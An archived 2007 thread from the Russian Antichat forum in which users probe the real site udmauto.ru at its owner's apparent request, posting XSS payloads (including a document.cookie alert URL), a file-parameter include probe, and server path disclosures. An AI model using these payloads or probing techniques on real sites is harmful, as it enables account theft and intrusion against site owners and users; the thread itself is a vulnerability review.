Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   udmauto.ru (https://forum.antichat.xyz/showthread.php?t=44850)

neval 20.07.2007 08:42

udmauto.ru
 
Всем спасибо.
Закрыто.

Elvis000 20.07.2007 12:16

"/><script>alert(/xss/)</script> в поле поиск, в поле e-mail

http://udmauto.ru/img.php?rand=995248785&file=1'

halkfild 20.07.2007 20:05

вышеописаные ксс

расскрытие путей
Код:

/home/automark/public_html/udmauto-ru/img.php
это просто так
http://udmauto.ru/img.php?rand=243436185&file=http://img138.imageshack.us/img138/7638/new14zh2.jpg

типо инклюд только бесполезный

смотрю дальше

Dark.iNiTro 24.07.2007 17:10

совет - фильтровать данные не только с помошью mod_rewrite но и в скрипте (если вся безопасноть основываеться только на этом моде)

halkfild 04.08.2007 16:26

баг в восстановлении пароля..

вводим любое слово в мейл и нажимаем напомнить
Цитата:

ошибка: пользователь < antichat > не найден

Warning: Cannot modify header information - headers already sent by (output started at /home/automark/public_html/udmauto-ru/_lib/lib_author.inc.php:266) in /home/automark/public_html/udmauto-ru/_lib/lib_author.inc.php on line 393

баг в подписке http://udmauto.ru/personal-subscr.html
Цитата:

Warning: Variable passed to each() is not an array or object in /home/automark/public_html/udmauto-ru/_lib/tools.inc.php(1684) : eval()'d code on line 16

раскрытие путей в файле personal-face.html в профиле
Цитата:

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/automark/public_html/udmauto-ru/_lib/tools.inc.php on line 3637
Not Supported File
Warning: copy(/home/automark/public_html/udmauto-ru/thumbnails/300-home/qwwwww@inbox.ru/2.php) [function.copy]: failed to open stream: No such file or directory in /home/automark/public_html/udmauto-ru/_usr/personalchange.inc.php on line 55

Пассивная ксс
Цитата:

http://udmauto.ru/use-remember&login=qwww%22%3E%3Cscript%3Ealert(documen t.cookie)%3C/script%3E.html

ShAnKaR 05.08.2007 03:04

картиночку проверочную от ботов в коментарии бы а то заспамят зуб даю.


Время: 16:45